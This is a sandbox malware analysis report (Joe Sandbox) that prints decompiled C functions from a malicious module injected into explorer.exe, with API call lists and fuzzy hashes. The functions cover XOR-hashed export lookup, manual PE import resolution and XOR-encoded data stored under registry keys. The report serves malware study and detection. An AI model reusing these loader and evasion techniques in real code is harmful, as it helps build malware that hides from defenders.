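	// XORed with 0x218fe95b, equals the value requested in __edx.
	while(1) {
		L2:
		_t49 = E032EE3C8( *((intOrPtr*)(_t73 + _t47 * 4)) + _t75, E032EA5DA( *((intOrPtr*)(_t73 + _t47 * 4)) + _t75), 0);
		_t51 = _v8;
		if((_t49 ^ 0x218fe95b) == _v12) {
			break;
		}
		_t73 = _v20;
		_t47 = _t51 + 1;
		_v8 = _t47;
		if(_t47 < _v16) {
			continue;
		}
		goto L4;
	}
	// Map the matching name index to its address through the ordinal table.
	_t69 =  *((intOrPtr*)(_t60 + _t75 + 0x78)) + _t75;
	_t80 =  *((intOrPtr*)(_v28 + ( *(_v24 + _t51 * 2) & 0x0000ffff) * 4)) + _t75;
	// An address outside the export directory (size at NT headers + 0x7c) is the function itself.
	if(_t80 < _t69 || _t80 >=  *((intOrPtr*)(_t60 + _t75 + 0x7c)) + _t69) {
		return _t80;
	} else {
		// Otherwise it is a forwarder string "MODULE.Function": copy the module part (up to 0x40 chars).
		_t56 = 0;
		while(1) {
			_t70 = _t80[_t56];
			if(_t70 == 0x2e || _t70 == 0) {
				break;
			}
			 *((char*)(_t82 + _t56 - 0x58)) = _t70;
			_t56 = _t56 + 1;
			if(_t56 < 0x40) {
				continue;
			}
			break;
		}
		// 0x6c6c642e is ".dll" in little-endian byte order; append it and terminate the string.
		 *((intOrPtr*)(_t82 + _t56 - 0x58)) = 0x6c6c642e;
		 *((char*)(_t82 + _t56 - 0x54)) = 0;
		// Skip past the '.' so _t80 points at the forwarded function name.
		if( *((char*)(_t56 + _t80)) != 0) {
			_t80 =  &(( &(_t80[1]))[_t56]);
		}
		_t40 =  &_v92; // 0x6c6c642e
		_t58 = LoadLibraryA(_t40); // executed
		if(_t58 == 0) {
			goto L4;
		}
		_t59 = GetProcAddress(_t58, _t80);
		if(_t59 == 0) {
			goto L4;
		}
		return _t59;
	}
}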

                                                                                                            APIs
                                                                                                            • LoadLibraryA.KERNELBASE(.dll,?,00000138,00000000), ref: 032EF088
                                                                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 032EF094
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000001D.00000002.721903989.00000000032E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 032E0000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_29_2_32e0000_explorer.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: AddressLibraryLoadProc
                                                                                                            • String ID: .dll
                                                                                                            • API String ID: 2574300362-2738580789
                                                                                                            • Opcode ID: a1f2e06acab93992290e730debf9686f803fa0d758b23185afdf7f693ec12342
                                                                                                            • Instruction ID: 9e8aa46eb4a13a21aee85f2e28eaaf4b971f000d800521774249781c80af5085
                                                                                                            • Opcode Fuzzy Hash: a1f2e06acab93992290e730debf9686f803fa0d758b23185afdf7f693ec12342
                                                                                                            • Instruction Fuzzy Hash: 85313431A1021AAFDB24CF6DC981BAEFBF5AF44205F694069D805D7309DB70D9C1CBA0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Control-flow Graph

                                                                                                            C-Code - Quality: 100%
                                                                                                            			E032EDE84(void* __ecx) {
                                                                                                            				intOrPtr _t12;
                                                                                                            				intOrPtr _t14;
                                                                                                            				intOrPtr _t15;
                                                                                                            				intOrPtr _t16;
                                                                                                            				intOrPtr _t21;
                                                                                                            				intOrPtr _t22;
                                                                                                            				void* _t28;
                                                                                                            				void* _t32;
                                                                                                            				struct _OSVERSIONINFOA* _t33;
                                                                                                            
                                                                                                            				_t12 =  *0x32ff8e0; // 0x52ef6c8
                                                                                                            				_t33 =  *0x32ff8e4; // 0x3310000
                                                                                                            				_t14 = E032ECA1B( *((intOrPtr*)(_t12 + 0x12c))(_t28, _t32, __ecx)); // executed
                                                                                                            				 *((intOrPtr*)(_t33 + 0x110)) = _t14;
                                                                                                            				_t3 = _t33 + 0x1644; // 0x3311644
                                                                                                            				_t29 = _t3;
                                                                                                            				_t15 =  *0x32ff8e0; // 0x52ef6c8
                                                                                                            				_t16 =  *((intOrPtr*)(_t15 + 0x128))(0, _t3, 0x105);
                                                                                                            				_t37 = _t16;
                                                                                                            				if(_t16 != 0) {
                                                                                                            					_t16 = E032E9790(_t29, _t37);
                                                                                                            				}
                                                                                                            				_t5 = _t33 + 0x228; // 0x3310228
                                                                                                            				 *((intOrPtr*)(_t33 + 0x1854)) = _t16;
                                                                                                            				 *((intOrPtr*)(_t33 + 0x434)) = E032E9790(_t5, _t37);
                                                                                                            				E032E8F0A(_t33, 0, 0x9c);
                                                                                                            				_t33->dwOSVersionInfoSize = 0x9c;
                                                                                                            				GetVersionExA(_t33);
                                                                                                            				 *((intOrPtr*)(_t33 + 0x1640)) = GetCurrentProcessId();
                                                                                                            				_t21 = E032EF3E5(_t5);
                                                                                                            				_t9 = _t33 + 0x220; // 0x3310220
                                                                                                            				 *((intOrPtr*)(_t33 + 0x21c)) = _t21;
                                                                                                            				_t22 = E032EF420(_t9); // executed
                                                                                                            				 *((intOrPtr*)(_t33 + 0x218)) = _t22;
                                                                                                            				return _t22;
                                                                                                            			}













                                                                                                            APIs
                                                                                                            • GetVersionExA.KERNEL32(03310000,03310000,?,032E3B3D), ref: 032EDEF7
                                                                                                            • GetCurrentProcessId.KERNEL32(?,032E3B3D), ref: 032EDEFD
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000001D.00000002.721903989.00000000032E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 032E0000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_29_2_32e0000_explorer.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CurrentProcessVersion
                                                                                                            • String ID:
                                                                                                            • API String ID: 2809935031-0
                                                                                                            • Opcode ID: 9ee5767bd5e3d2584a6c0fdb7be0bc7da6b6670cbba2d0d00c2851514aae6fa4
                                                                                                            • Instruction ID: 7fad557daab6f19c7096a03a604ccfbe91a56d6587a0f7af8089550a821c574f
                                                                                                            • Opcode Fuzzy Hash: 9ee5767bd5e3d2584a6c0fdb7be0bc7da6b6670cbba2d0d00c2851514aae6fa4
                                                                                                            • Instruction Fuzzy Hash: 020140B5510700AFC710FF70A94EFDA77E9EF98310F49482EE55A8B240EBB46580CB94
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Control-flow Graph

                                                                                                            C-Code - Quality: 50%
                                                                                                            			E032F3789(signed int __eax, void* __ecx, intOrPtr _a4) {
                                                                                                            				intOrPtr* _v8;
                                                                                                            				signed int* _v12;
                                                                                                            				signed int _v16;
                                                                                                            				signed int _v20;
                                                                                                            				signed int _v24;
                                                                                                            				signed int _v28;
                                                                                                            				intOrPtr _v32;
                                                                                                            				struct HINSTANCE__* _v36;
                                                                                                            				intOrPtr _v40;
                                                                                                            				signed int _v44;
                                                                                                            				struct HINSTANCE__* _v48;
                                                                                                            				intOrPtr _v52;
                                                                                                            				signed int _v56;
                                                                                                            				intOrPtr _v60;
                                                                                                            				signed int _v64;
                                                                                                            				signed int _t109;
                                                                                                            				signed int _t112;
                                                                                                            				signed int _t115;
                                                                                                            				struct HINSTANCE__* _t121;
                                                                                                            				void* _t163;
                                                                                                            				void* _t167;
                                                                                                            
                                                                                                            				_t167 = __ecx;
                                                                                                            				_v44 = _v44 & 0x00000000;
                                                                                                            				if(_a4 != 0) {
                                                                                                            					_v48 = GetModuleHandleA("kernel32.dll");
                                                                                                            					_v40 = E032EF0A4(_t167, _v48, "GetProcAddress");
                                                                                                            					_v52 =  *((intOrPtr*)(_a4 + 0x3c)) + _a4;
                                                                                                            					_v32 = _v52;
                                                                                                            					_t109 = 8;
                                                                                                            					if( *((intOrPtr*)(_v32 + (_t109 << 0) + 0x78)) == 0) {
                                                                                                            						L24:
                                                                                                            						return 0;
                                                                                                            					}
                                                                                                            					_v56 = 0x80000000;
                                                                                                            					_t112 = 8;
                                                                                                            					_v8 = _a4 +  *((intOrPtr*)(_v32 + (_t112 << 0) + 0x78));
                                                                                                            					while( *((intOrPtr*)(_v8 + 0xc)) != 0) {
                                                                                                            						_v8 = _v8 + 0x14;
                                                                                                            					}
                                                                                                            					_t115 = 8;
                                                                                                            					_v8 = _a4 +  *((intOrPtr*)(_v32 + (_t115 << 0) + 0x78));
                                                                                                            					while( *((intOrPtr*)(_v8 + 0xc)) != 0) {
                                                                                                            						_t121 = LoadLibraryA( *((intOrPtr*)(_v8 + 0xc)) + _a4); // executed
                                                                                                            						_v36 = _t121;
                                                                                                            						if(_v36 != 0) {
                                                                                                            							if( *_v8 == 0) {
                                                                                                            								_v12 =  *((intOrPtr*)(_v8 + 0x10)) + _a4;
                                                                                                            							} else {
                                                                                                            								_v12 =  *_v8 + _a4;
                                                                                                            							}
                                                                                                            							_v28 = _v28 & 0x00000000;
                                                                                                            							while( *_v12 != 0) {
                                                                                                            								_v24 = _v24 & 0x00000000;
                                                                                                            								_v16 = _v16 & 0x00000000;
                                                                                                            								_v64 = _v64 & 0x00000000;
                                                                                                            								_v20 = _v20 & 0x00000000;
                                                                                                            								if(( *_v12 & _v56) == 0) {
                                                                                                            									_v60 =  *_v12 + _a4;
                                                                                                            									_v20 = _v60 + 2;
                                                                                                            									_v24 =  *( *((intOrPtr*)(_v8 + 0x10)) + _a4 + _v28);
                                                                                                            									_v16 = _v40(_v36, _v20);
                                                                                                            								} else {
                                                                                                            									_v24 =  *_v12;
                                                                                                            									_v20 = _v24 & 0x0000ffff;
                                                                                                            									_v16 = _v40(_v36, _v20);
                                                                                                            								}
                                                                                                            								if(_v24 != _v16) {
                                                                                                            									_v44 = _v44 + 1;
                                                                                                            									if( *((intOrPtr*)(_v8 + 0x10)) == 0) {
                                                                                                            										 *_v12 = _v16;
                                                                                                            									} else {
                                                                                                            										 *( *((intOrPtr*)(_v8 + 0x10)) + _a4 + _v28) = _v16;
                                                                                                            									}
                                                                                                            								}
                                                                                                            								_v12 =  &(_v12[1]);
                                                                                                            								_v28 = _v28 + 4;
                                                                                                            							}
                                                                                                            							_v8 = _v8 + 0x14;
                                                                                                            							continue;
                                                                                                            						}
                                                                                                            						_t163 = 0xfffffffd;
                                                                                                            						return _t163;
                                                                                                            					}
                                                                                                            					goto L24;
                                                                                                            				}
                                                                                                            				return __eax | 0xffffffff;
                                                                                                            			}

























                                                                                                            APIs
                                                                                                            • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 032F37A6
                                                                                                            • LoadLibraryA.KERNELBASE(00000000), ref: 032F383F
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000001D.00000002.721903989.00000000032E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 032E0000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_29_2_32e0000_explorer.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: HandleLibraryLoadModule
                                                                                                            • String ID: GetProcAddress$kernel32.dll
                                                                                                            • API String ID: 4133054770-1584408056
                                                                                                            • Opcode ID: 504d28aa68d0e62a15030bcb8c23ec08a94f9491d75aab84559942eaecfa6d0e
                                                                                                            • Instruction ID: 65408660a4a6c4c3ef0c60ba2841a91786c426758993eae988b7c7e23d9f00b4
                                                                                                            • Opcode Fuzzy Hash: 504d28aa68d0e62a15030bcb8c23ec08a94f9491d75aab84559942eaecfa6d0e
                                                                                                            • Instruction Fuzzy Hash: 49617F79D10209EFDB00CF98D585BADBBB1FF08325F2485A9EA15AB351C374AA80CF54
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Control-flow Graph

                                                                                                            C-Code - Quality: 80%
                                                                                                            			E032EA7D0(char __ecx, int __edx, void* __fp0, intOrPtr _a4, int* _a8, intOrPtr* _a12) {
                                                                                                            				void* _v8;
                                                                                                            				int _v12;
                                                                                                            				void* _v16;
                                                                                                            				void* _v20;
                                                                                                            				int _v24;
                                                                                                            				void* _v28;
                                                                                                            				char _v32;
                                                                                                            				char _v36;
                                                                                                            				char _v40;
                                                                                                            				int _v44;
                                                                                                            				char _v108;
                                                                                                            				int _t85;
                                                                                                            				char _t89;
                                                                                                            				void* _t90;
                                                                                                            				char* _t91;
                                                                                                            				intOrPtr* _t96;
                                                                                                            				void* _t107;
                                                                                                            				int* _t115;
                                                                                                            				intOrPtr _t118;
                                                                                                            				char* _t121;
                                                                                                            				intOrPtr _t122;
                                                                                                            				intOrPtr _t124;
                                                                                                            				intOrPtr _t127;
                                                                                                            				char _t129;
                                                                                                            				intOrPtr _t130;
                                                                                                            				intOrPtr _t132;
                                                                                                            				char* _t135;
                                                                                                            				int _t139;
                                                                                                            				int _t143;
                                                                                                            				intOrPtr _t144;
                                                                                                            				intOrPtr* _t150;
                                                                                                            				int _t151;
                                                                                                            				char _t157;
                                                                                                            				int _t159;
                                                                                                            				intOrPtr _t160;
                                                                                                            				intOrPtr _t167;
                                                                                                            				int _t172;
                                                                                                            				char* _t173;
                                                                                                            				char* _t174;
                                                                                                            				char _t175;
                                                                                                            				void* _t176;
                                                                                                            				void* _t177;
                                                                                                            				void* _t179;
                                                                                                            
                                                                                                            				_t172 = 0;
                                                                                                            				_v24 = __edx;
                                                                                                            				_t173 = 0;
                                                                                                            				_v32 = __ecx;
                                                                                                            				_v28 = 0;
                                                                                                            				_v8 = 0x80000001;
                                                                                                            				_v20 = 0;
                                                                                                            				_t85 = E032E8D70(0x110);
                                                                                                            				_t151 = _t85;
                                                                                                            				_v44 = _t151;
                                                                                                            				_t180 = _t151;
                                                                                                            				if(_t151 == 0) {
                                                                                                            					return _t85;
                                                                                                            				}
                                                                                                            				_t154 = _a4;
                                                                                                            				 *((intOrPtr*)(_t151 + 0x108)) = _a4;
                                                                                                            				E032EC5D7(_a4, __edx, _t180, __fp0, _t154,  &_v108);
                                                                                                            				_t157 = _v108;
                                                                                                            				_t89 = _t157;
                                                                                                            				if(_t157 - 0x61 <= 0x19) {
                                                                                                            					_t89 = _t89 - 0x20;
                                                                                                            				}
                                                                                                            				_v108 = _t89;
                                                                                                            				_t90 = E032E9F75(0x33d);
                                                                                                            				_t159 = _v24;
                                                                                                            				_v16 = _t90;
                                                                                                            				if(_t159 == 0) {
                                                                                                            					L15:
                                                                                                            					_t160 =  *0x32ff8e4; // 0x3310000
                                                                                                            					__eflags =  *((intOrPtr*)(_t160 + 0x214)) - 3;
                                                                                                            					if( *((intOrPtr*)(_t160 + 0x214)) != 3) {
                                                                                                            						_push(_t172);
                                                                                                            						_push( &_v108);
                                                                                                            						_push("\\");
                                                                                                            						_t91 = E032E9BA4(_t90);
                                                                                                            						_t177 = _t177 + 0x10;
                                                                                                            						L19:
                                                                                                            						_t173 = _t91;
                                                                                                            						_v20 = _t173;
                                                                                                            						goto L20;
                                                                                                            					}
                                                                                                            					_v24 = _t172;
                                                                                                            					_v8 = 0x80000003;
                                                                                                            					_t118 =  *0x32ff8e8; // 0x52ef8b8
                                                                                                            					 *((intOrPtr*)(_t118 + 0x20))( *((intOrPtr*)( *((intOrPtr*)(_t160 + 0x110)))),  &_v24);
                                                                                                            					__eflags = _v24 - _t173;
                                                                                                            					if(_v24 == _t173) {
                                                                                                            						goto L20;
                                                                                                            					}
                                                                                                            					_push(_t172);
                                                                                                            					_push( &_v108);
                                                                                                            					_t121 = "\\";
                                                                                                            					_push(_t121);
                                                                                                            					_push(_v16);
                                                                                                            					_push(_t121);
                                                                                                            					_t91 = E032E9BA4(_v24);
                                                                                                            					_t177 = _t177 + 0x18;
                                                                                                            					goto L19;
                                                                                                            				} else {
                                                                                                            					_t122 =  *0x32ff8e4; // 0x3310000
                                                                                                            					_push( *((intOrPtr*)( *((intOrPtr*)(_t122 + 0x110)))));
                                                                                                            					_t124 =  *0x32ff8e8; // 0x52ef8b8
                                                                                                            					_push(_t159);
                                                                                                            					if( *((intOrPtr*)(_t124 + 0x68))() != 0) {
                                                                                                            						_t90 = _v16;
                                                                                                            						goto L15;
                                                                                                            					}
                                                                                                            					_v12 = _t172;
                                                                                                            					_t127 =  *0x32ff8e8; // 0x52ef8b8
                                                                                                            					_v8 = 0x80000003;
                                                                                                            					 *((intOrPtr*)(_t127 + 0x20))(_v24,  &_v12);
                                                                                                            					if(_v12 == _t173) {
                                                                                                            						L20:
                                                                                                            						E032E8D2E( &_v16);
                                                                                                            						if(RegOpenKeyExA(_v8, _t173, _t172, 0x20019,  &_v28) == 0) {
                                                                                                            							_t96 = _a8;
                                                                                                            							__eflags = _t96;
                                                                                                            							if(_t96 != 0) {
                                                                                                            								 *_t96 = 1;
                                                                                                            							}
                                                                                                            							RegCloseKey(_v28);
                                                                                                            							L28:
                                                                                                            							if(_t173 == 0) {
                                                                                                            								L32:
                                                                                                            								E032E8D86( &_v44, 0x110);
                                                                                                            								E032E8F0A( &_v108, _t172, 0x40);
                                                                                                            								_t151 = _t172;
                                                                                                            								L33:
                                                                                                            								E032E8D86( &_v20, 0xffffffff);
                                                                                                            								return _t151;
                                                                                                            							}
                                                                                                            							 *((intOrPtr*)(_t151 + 0x10c)) = _v8;
                                                                                                            							_t107 = E032EA5DA(_t173);
                                                                                                            							 *_t151 = _t107;
                                                                                                            							if(_t107 == 0) {
                                                                                                            								goto L33;
                                                                                                            							} else {
                                                                                                            								goto L30;
                                                                                                            							}
                                                                                                            							do {
                                                                                                            								L30:
                                                                                                            								 *(_t151 + _t172 + 4) =  *(_t176 + (_t172 & 0x00000003) + 8) ^ _t173[_t172];
                                                                                                            								_t172 = _t172 + 1;
                                                                                                            							} while (_t172 <  *_t151);
                                                                                                            							goto L33;
                                                                                                            						}
                                                                                                            						_v16 = _t172;
                                                                                                            						if(RegCreateKeyA(_v8, _t173,  &_v16) != 0) {
                                                                                                            							goto L32;
                                                                                                            						}
                                                                                                            						_t115 = _a8;
                                                                                                            						if(_t115 != 0) {
                                                                                                            							 *_t115 = _t172;
                                                                                                            						}
                                                                                                            						RegCloseKey(_v16);
                                                                                                            						goto L28;
                                                                                                            					}
                                                                                                            					_push(_t172);
                                                                                                            					_push(_v16);
                                                                                                            					_t174 = "\\";
                                                                                                            					_push(_t174);
                                                                                                            					_t129 = E032E9BA4(_v12);
                                                                                                            					_t177 = _t177 + 0x10;
                                                                                                            					_v40 = _t129;
                                                                                                            					if(_t129 == 0) {
                                                                                                            						goto L32;
                                                                                                            					}
                                                                                                            					_push( &_v36);
                                                                                                            					_push(0x20019);
                                                                                                            					_push(_t172);
                                                                                                            					_push(_t129);
                                                                                                            					_t130 =  *0x32ff8e8; // 0x52ef8b8
                                                                                                            					_push(_v8);
                                                                                                            					if( *((intOrPtr*)(_t130 + 0x14))() == 0) {
                                                                                                            						_t132 =  *0x32ff8e8; // 0x52ef8b8
                                                                                                            						 *((intOrPtr*)(_t132 + 0x1c))(_v36);
                                                                                                            					} else {
                                                                                                            						_t139 = E032E9F8F( &_v36, 0x304);
                                                                                                            						_push(_t172);
                                                                                                            						_push(_t139);
                                                                                                            						_push(0x32fc9d8);
                                                                                                            						_v24 = _t139;
                                                                                                            						_t175 = E032E9BF7(_v32);
                                                                                                            						_v32 = _t175;
                                                                                                            						E032E8D41( &_v24);
                                                                                                            						_t179 = _t177 + 0x18;
                                                                                                            						_t143 = E032E9ACD(_v12);
                                                                                                            						_push(_t175);
                                                                                                            						_push(_t143);
                                                                                                            						_push(_v8);
                                                                                                            						_v24 = _t143;
                                                                                                            						_t144 =  *0x32ff8e8; // 0x52ef8b8
                                                                                                            						if( *((intOrPtr*)(_t144 + 0x30))() == 0) {
                                                                                                            							_t150 = _a12;
                                                                                                            							if(_t150 != 0) {
                                                                                                            								 *_t150 = 1;
                                                                                                            							}
                                                                                                            						}
                                                                                                            						E032E8D86( &_v32, 0xfffffffe);
                                                                                                            						E032E8D86( &_v24, 0xfffffffe);
                                                                                                            						_t177 = _t179 + 0x10;
                                                                                                            						_t174 = "\\";
                                                                                                            					}
                                                                                                            					_t135 = E032E9BA4(_v12);
                                                                                                            					_t167 =  *0x32ff8e0; // 0x52ef6c8
                                                                                                            					_t177 = _t177 + 0x18;
                                                                                                            					_t173 = _t135;
                                                                                                            					_v20 = _t173;
                                                                                                            					 *((intOrPtr*)(_t167 + 0x34))(_v12, _t174, _v16, _t174,  &_v108, _t172);
                                                                                                            					E032E8D86( &_v40, 0xffffffff);
                                                                                                            					goto L20;
                                                                                                            				}
                                                                                                            			}


                                                                                                            APIs
                                                                                                              • Part of subcall function 032E8D70: RtlAllocateHeap.NTDLL(00000008,?,?,032E973A,00000100,?,032E65BF), ref: 032E8D7E
                                                                                                              • Part of subcall function 032E8D86: RtlFreeHeap.NTDLL(00000000,00000000), ref: 032E8DCC
                                                                                                            • RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,032EA7BE,?,?,00000001), ref: 032EA9FC
                                                                                                            • RegCreateKeyA.ADVAPI32(80000001,00000000,00000000,?,?,00000001), ref: 032EAA13
                                                                                                            • RegCloseKey.KERNELBASE(032EA7BE,?,?,00000001), ref: 032EAA3D
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000001D.00000002.721903989.00000000032E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 032E0000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_29_2_32e0000_explorer.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Heap$AllocateCloseCreateFreeOpen
                                                                                                            • String ID:
                                                                                                            • API String ID: 3570936880-0
                                                                                                            • Opcode ID: e3630c3b9def291c6b048f13c3d081d3cff8e33d9ed8e85ea46ad4c5cd42daf5
                                                                                                            • Instruction ID: 39d8167322476ad1ea8e0ca1dd6b9990cc87478edc03f37e5943d9b3b924488f
                                                                                                            • Opcode Fuzzy Hash: e3630c3b9def291c6b048f13c3d081d3cff8e33d9ed8e85ea46ad4c5cd42daf5
                                                                                                            • Instruction Fuzzy Hash: 64917B75D1020AAFDF10DFA4ED46DEEBBB8EF09710F5441A9E504EB251D7719A80CBA0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 131 32ec997-32ec9b7 GetTokenInformation 132 32ec9fd 131->132 133 32ec9b9-32ec9c2 GetLastError 131->133 134 32ec9ff-32eca03 132->134 133->132 135 32ec9c4-32ec9d4 call 32e8d70 133->135 138 32ec9da-32ec9ed GetTokenInformation 135->138 139 32ec9d6-32ec9d8 135->139 138->132 140 32ec9ef-32ec9fb call 32e8d86 138->140 139->134 140->139
                                                                                                            C-Code - Quality: 86%
                                                                                                            			E032EC997(union _TOKEN_INFORMATION_CLASS __edx, DWORD* _a4) {
                                                                                                            				long _v8;
                                                                                                            				void* _v12;
                                                                                                            				void* _t12;
                                                                                                            				void* _t20;
                                                                                                            				void* _t22;
                                                                                                            				union _TOKEN_INFORMATION_CLASS _t28;
                                                                                                            				void* _t31;
                                                                                                            
                                                                                                            				_push(_t22);
                                                                                                            				_push(_t22);
                                                                                                            				_t31 = 0;
                                                                                                            				_t28 = __edx;
                                                                                                            				_t20 = _t22;
                                                                                                            				if(GetTokenInformation(_t20, __edx, 0, 0,  &_v8) != 0 || GetLastError() != 0x7a) {
                                                                                                            					L6:
                                                                                                            					_t12 = _t31;
                                                                                                            				} else {
                                                                                                            					_t31 = E032E8D70(_v8);
                                                                                                            					_v12 = _t31;
                                                                                                            					if(_t31 != 0) {
                                                                                                            						if(GetTokenInformation(_t20, _t28, _t31, _v8, _a4) != 0) {
                                                                                                            							goto L6;
                                                                                                            						} else {
                                                                                                            							E032E8D86( &_v12, _t16);
                                                                                                            							goto L3;
                                                                                                            						}
                                                                                                            					} else {
                                                                                                            						L3:
                                                                                                            						_t12 = 0;
                                                                                                            					}
                                                                                                            				}
                                                                                                            				return _t12;
                                                                                                            			}











                                                                                                            APIs
                                                                                                            • GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,00000000,00000000,00001644,032E0000,00000000,00000000,?,032ECA18,00000000,00000000,?,032ECA41), ref: 032EC9B2
                                                                                                            • GetLastError.KERNEL32(?,032ECA18,00000000,00000000,?,032ECA41,00001644,?,032EE0D1), ref: 032EC9B9
                                                                                                              • Part of subcall function 032E8D70: RtlAllocateHeap.NTDLL(00000008,?,?,032E973A,00000100,?,032E65BF), ref: 032E8D7E
                                                                                                            • GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,?,?,032ECA18,00000000,00000000,?,032ECA41,00001644,?,032EE0D1), ref: 032EC9E8
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000001D.00000002.721903989.00000000032E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 032E0000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_29_2_32e0000_explorer.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: InformationToken$AllocateErrorHeapLast
                                                                                                            • String ID:
                                                                                                            • API String ID: 2499131667-0
                                                                                                            • Opcode ID: 0f4dbd07c0b478dfa976efaaf8957666fba814f6ee24cd96833fe57db294ad09
                                                                                                            • Instruction ID: 4b5ef7692c762edf173d72861e86709f30ab995bf4cee0f2b1cf8b6db1d2aa7a
                                                                                                            • Opcode Fuzzy Hash: 0f4dbd07c0b478dfa976efaaf8957666fba814f6ee24cd96833fe57db294ad09
                                                                                                            • Instruction Fuzzy Hash: 4101A273620229BF8B20DAE6ED4ADFF7FACDA456B17500166F405E7100EA70DD80C7A0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 159 32ef159-32ef179 call 32e9f75 162 32ef17b-32ef181 GetModuleHandleA 159->162 163 32ef183-32ef188 LoadLibraryA 159->163 164 32ef18a-32ef18c 162->164 163->164 165 32ef18e-32ef193 call 32ef10e 164->165 166 32ef19b-32ef1a9 call 32e8d2e 164->166 169 32ef198-32ef199 165->169 169->166
                                                                                                            C-Code - Quality: 47%
                                                                                                            			E032EF159(void* __ecx, void* __edx, intOrPtr _a4) {
                                                                                                            				char _v8;
                                                                                                            				char _t5;
                                                                                                            				struct HINSTANCE__* _t7;
                                                                                                            				void* _t10;
                                                                                                            				void* _t12;
                                                                                                            				void* _t22;
                                                                                                            				void* _t25;
                                                                                                            
                                                                                                            				_push(__ecx);
                                                                                                            				_t12 = __ecx;
                                                                                                            				_t22 = __edx;
                                                                                                            				_t5 = E032E9F75(_a4);
                                                                                                            				_t25 = 0;
                                                                                                            				_v8 = _t5;
                                                                                                            				_push(_t5);
                                                                                                            				if(_a4 != 0x2b4) {
                                                                                                            					_t7 = LoadLibraryA(); // executed
                                                                                                            				} else {
                                                                                                            					_t7 = GetModuleHandleA();
                                                                                                            				}
                                                                                                            				if(_t7 != 0) {
                                                                                                            					_t10 = E032EF10E(_t12, _t22, _t7); // executed
                                                                                                            					_t25 = _t10;
                                                                                                            				}
                                                                                                            				E032E8D2E( &_v8);
                                                                                                            				return _t25;
                                                                                                            			}











                                                                                                            APIs
                                                                                                            • GetModuleHandleA.KERNEL32(00000000,?,?,?,032FCA88,?,032E65E3,?), ref: 032EF17B
                                                                                                            • LoadLibraryA.KERNELBASE(00000000,?,?,?,032FCA88,?,032E65E3,?), ref: 032EF188
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000001D.00000002.721903989.00000000032E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 032E0000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_29_2_32e0000_explorer.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: HandleLibraryLoadModule
                                                                                                            • String ID:
                                                                                                            • API String ID: 4133054770-0
                                                                                                            • Opcode ID: 82719e319c393abca72745eea42200eceab8bc2e2c6e38b3fe7fa63b10339568
                                                                                                            • Instruction ID: 1b59a1235fdd6cd3268ac5ac263447ae40a54ed2d8824e0eb750f26dad5702a1
                                                                                                            • Opcode Fuzzy Hash: 82719e319c393abca72745eea42200eceab8bc2e2c6e38b3fe7fa63b10339568
                                                                                                            • Instruction Fuzzy Hash: CDF0A736724218BFD704FBA9EA4585AB3ECDF48694755407AF406DB250DAB0CD808790
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 171 32eb564-32eb573 172 32eb57c-32eb587 call 32eb49b 171->172 173 32eb575-32eb577 171->173 177 32eb5fd 172->177 178 32eb589-32eb59b 172->178 174 32eb601-32eb603 173->174 179 32eb5ff-32eb600 177->179 181 32eb59d-32eb5ae call 32e8d70 178->181 182 32eb5e3-32eb5ee 178->182 179->174 181->182 187 32eb5b0-32eb5c2 call 32eb509 181->187 182->177 186 32eb5f0-32eb5fc call 32e8d86 182->186 186->177 187->182 192 32eb5c4-32eb5c7 187->192 192->182 193 32eb5c9-32eb5d2 192->193 194 32eb5d6-32eb5e1 FindCloseChangeNotification 193->194 195 32eb5d4 193->195 194->179 195->194
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E032EB564(char _a4, intOrPtr* _a8) {
                                                                                                            				char _v8;
                                                                                                            				void* __ecx;
                                                                                                            				intOrPtr _t14;
                                                                                                            				intOrPtr _t15;
                                                                                                            				intOrPtr _t17;
                                                                                                            				void* _t24;
                                                                                                            				intOrPtr* _t25;
                                                                                                            				void* _t29;
